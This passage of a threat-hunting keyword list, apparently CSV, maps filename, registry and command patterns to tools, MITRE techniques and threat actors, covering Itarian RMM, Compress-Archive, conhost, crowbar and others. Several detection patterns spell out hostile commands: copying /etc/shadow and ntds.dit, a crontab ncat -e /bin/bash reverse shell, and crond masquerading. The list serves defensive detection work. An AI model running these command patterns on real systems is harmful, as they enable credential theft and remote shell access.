Yanluowang - menuPass","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","135","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z"
"*.comodo.com/static/frontend/static-pages/enroll-wizard/token*",".{0,1000}\.comodo\.com\/static\/frontend\/static\-pages\/enroll\-wizard\/token.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/RemoteControlSetup.exe*",".{0,1000}\/RemoteControlSetup\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/tmp/*/enroll.sh*",".{0,1000}\/tmp\/.{0,1000}\/enroll\.sh.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/tmp/*/itsm.service*",".{0,1000}\/tmp\/.{0,1000}\/itsm\.service.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/tmp/*/itsm-linux*",".{0,1000}\/tmp\/.{0,1000}\/itsm\-linux.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\ITarian_Remote_Access_*",".{0,1000}\\AppData\\Local\\Temp\\ITarian_Remote_Access_.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\Temp\Remote_Control_by_Itarian*",".{0,1000}\\AppData\\Local\\Temp\\Remote_Control_by_Itarian.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ComodoRemoteControl.exe*",".{0,1000}\\ComodoRemoteControl\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\ItsmRsp*",".{0,1000}\\CurrentControlSet\\Services\\ItsmRsp.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#servicename","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\ITSMService*",".{0,1000}\\CurrentControlSet\\Services\\ITSMService.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#servicename","N/A","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\RmmService*",".{0,1000}\\CurrentControlSet\\Services\\RmmService.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#servicename","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ITarian Remote Access.lnk*",".{0,1000}\\ITarian\sRemote\sAccess\.lnk.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\itarian\endpoint manager\itsmagent.exe*",".{0,1000}\\itarian\\endpoint\smanager\\itsmagent\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\itarian\endpoint manager\itsmservice.exe*",".{0,1000}\\itarian\\endpoint\smanager\\itsmservice\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\itarian\endpoint manager\rhost.exe*",".{0,1000}\\itarian\\endpoint\smanager\\rhost\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ITarian\RemoteControl*",".{0,1000}\\ITarian\\RemoteControl.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ITarian_Remote_Access_*.log*",".{0,1000}\\ITarian_Remote_Access_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ITarianRemoteAccess.exe*",".{0,1000}\\ITarianRemoteAccess\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\ITarian\Endpoint Manager\*",".{0,1000}\\Program\sFiles\s\(x86\)\\ITarian\\Endpoint\sManager\\.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\ITarian\RemoteControl\*",".{0,1000}\\Program\sFiles\s\(x86\)\\ITarian\\RemoteControl\\.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Remote_Control_by_ITarian_*.log*",".{0,1000}\\Remote_Control_by_ITarian_.{0,1000}\.log.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remotecontrol\rcontrol.exe*",".{0,1000}\\remotecontrol\\rcontrol\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\remotecontrol\rviewer.exe*",".{0,1000}\\remotecontrol\\rviewer\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemoteControlbyITarian (3).exe*",".{0,1000}\\RemoteControlbyITarian\s\(3\)\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemoteControlbyITarian_(3).exe*",".{0,1000}\\RemoteControlbyITarian_\(3\)\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RemoteControlSetup.exe*",".{0,1000}\\RemoteControlSetup\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\RmmService.exe*",".{0,1000}\\RmmService\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\ITarian\RemoteControl*",".{0,1000}\\SOFTWARE\\ITarian\\RemoteControl.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\WOW6432Node\ITarian\ITSM\*",".{0,1000}\\SOFTWARE\\WOW6432Node\\ITarian\\ITSM\\.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#registry","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Remote Control by Itarian<*",".{0,1000}\>Remote\sControl\sby\sItarian\<.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>RmmService<*",".{0,1000}\>RmmService\<.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","#servicename","N/A","10","10","N/A","N/A","N/A","N/A"
"*cwn-log-collector-production-clone.*.elasticbeanstalk.com*",".{0,1000}cwn\-log\-collector\-production\-clone\..{0,1000}\.elasticbeanstalk\.com.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ITarianRemoteAccessSetup.exe*",".{0,1000}ITarianRemoteAccessSetup\.exe.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Linux ITSM Agent/* -e /tmp/install.sh *",".{0,1000}Linux\sITSM\sAgent\/.{0,1000}\s\-e\s\/tmp\/install\.sh\s.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*mdmsupport.comodo.com*",".{0,1000}mdmsupport\.comodo\.com.{0,1000}","greyware_tool_keyword","ComodoRMM (Itarian RMM)","Comodo offers IT Remote Management tools includes RMM Software - Remote Access - Service Desk - Patch Management and Network Assessment (Itarian RMM)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://one.comodo.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*:\programdata\cloud.exe*",".{0,1000}\:\\programdata\\cloud\.exe.{0,1000}","greyware_tool_keyword","Compress-Archive","Compress data using zlib for exfiltration","T1560 - T1020 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","https://x.com/malmoeb/status/1736995855482118314","10","10","N/A","N/A","N/A","N/A"
"*Compress-Archive -Path*-DestinationPath $env:TEMP*",".{0,1000}Compress\-Archive\s\-Path.{0,1000}\-DestinationPath\s\$env\:TEMP.{0,1000}","greyware_tool_keyword","Compress-Archive","Compress data using zlib for exfiltration","T1560 - T1020 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Compress-Archive -Path*-DestinationPath*:\Windows\Temp\*",".{0,1000}Compress\-Archive\s\-Path.{0,1000}\-DestinationPath.{0,1000}\:\\Windows\\Temp\\.{0,1000}","greyware_tool_keyword","Compress-Archive","Compress data using zlib for exfiltration","T1560 - T1020 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Compress-Archive -Path*-DestinationPath*\AppData\Local\Temp\'*",".{0,1000}Compress\-Archive\s\-Path.{0,1000}\-DestinationPath.{0,1000}\\AppData\\Local\\Temp\\\'.{0,1000}","greyware_tool_keyword","Compress-Archive","Compress data using zlib for exfiltration","T1560 - T1020 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*conhost.exe * --headless*",".{0,1000}conhost\.exe\s.{0,1000}\s\-\-headless.{0,1000}","greyware_tool_keyword","conhost.exe","conhost in headless mode - no visible window will pop up on the victim machine","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://x.com/TheDFIRReport/status/1721521617908473907?s=20","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A"
"*copy *.exe \\*\c$\Windows\*.exe*",".{0,1000}copy\s.{0,1000}\.exe\s\\\\.{0,1000}\\c\$\\Windows\\.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","copy","copying an executable to a remote machine in the c:\windows directory","T1021","TA0008","N/A","N/A","Lateral Movement","https://x.com/ACEResponder/status/1720906842631549377","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*copy *\NTDS\ntds.dit *\Temp\*.*",".{0,1000}copy\s.{0,1000}\\NTDS\\ntds\.dit\s.{0,1000}\\Temp\\.{0,1000}\..{0,1000}","greyware_tool_keyword","copy","the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.","T1003.001 - T1567.001 - T1070.004","TA0005 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*copy *NTDS\NTDS.dit*Temp*",".{0,1000}copy\s.{0,1000}NTDS\\NTDS\.dit.{0,1000}Temp.{0,1000}","greyware_tool_keyword","copy","copy the NTDS.dit file from a Volume Shadow Copy which contains sensitive Active Directory data including password hashes for all domain users","T1003.003","TA0009","N/A","N/A","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*cp /etc/passwd*",".{0,1000}cp\s\/etc\/passwd.{0,1000}","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cp /etc/shadow*",".{0,1000}cp\s\/etc\/shadow.{0,1000}","greyware_tool_keyword","cp","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*cp -i /bin/sh */crond*",".{0,1000}cp\s\-i\s\/bin\/sh\s.{0,1000}\/crond.{0,1000}","greyware_tool_keyword","crond","Masquerading as Linux Crond Process.Masquerading occurs when the name or location of an executable* legitimate or malicious. is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.","T1036 - T1564.003 - T1059.004","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","8034","2149","2024-08-29T18:41:50Z","2016-12-24T09:48:49Z"
"*crontab* sleep *ncat * -e /bin/bash*crontab*",".{0,1000}crontab.{0,1000}\ssleep\s.{0,1000}ncat\s.{0,1000}\s\-e\s\/bin\/bash.{0,1000}crontab.{0,1000}","greyware_tool_keyword","crontab","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Persistence","N/A","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*/crowbar.git*",".{0,1000}\/crowbar\.git.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_darwin_386.zip*",".{0,1000}\/crowbar_1\.0\.0_darwin_386\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_darwin_amd64.zip*",".{0,1000}\/crowbar_1\.0\.0_darwin_amd64\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_freebsd_386.zip*",".{0,1000}\/crowbar_1\.0\.0_freebsd_386\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_freebsd_amd64.zip*",".{0,1000}\/crowbar_1\.0\.0_freebsd_amd64\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_freebsd_arm.zip*",".{0,1000}\/crowbar_1\.0\.0_freebsd_arm\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_linux_386.tar.gz*",".{0,1000}\/crowbar_1\.0\.0_linux_386\.tar\.gz.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_linux_amd64.tar.gz*",".{0,1000}\/crowbar_1\.0\.0_linux_amd64\.tar\.gz.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_linux_arm.tar.gz*",".{0,1000}\/crowbar_1\.0\.0_linux_arm\.tar\.gz.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_openbsd_386.zip*",".{0,1000}\/crowbar_1\.0\.0_openbsd_386\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_openbsd_amd64.zip*",".{0,1000}\/crowbar_1\.0\.0_openbsd_amd64\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_windows_386.zip*",".{0,1000}\/crowbar_1\.0\.0_windows_386\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/crowbar_1.0.0_windows_amd64.zip*",".{0,1000}\/crowbar_1\.0\.0_windows_amd64\.zip.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","1","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/etc/crowbar/*",".{0,1000}\/etc\/crowbar\/.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*/etc/crowbard.conf*",".{0,1000}\/etc\/crowbard\.conf.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","N/A","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*47e4818c3db3471c950cdb4c4732232bafc584997098c92ada8a0f720e2ad448*",".{0,1000}47e4818c3db3471c950cdb4c4732232bafc584997098c92ada8a0f720e2ad448.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
"*4ba042e8f3a3f5cf7e01e64461d27f5733c505b8a0f221fb91ed44e93627cd91*",".{0,1000}4ba042e8f3a3f5cf7e01e64461d27f5733c505b8a0f221fb91ed44e93627cd91.{0,1000}","greyware_tool_keyword","crowbar","Tunnel TCP over a plain HTTP session","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/q3k/crowbar","1","0","#filehash","N/A","10","10","468","48","2021-01-24T08:21:05Z","2015-02-03T18:40:00Z"
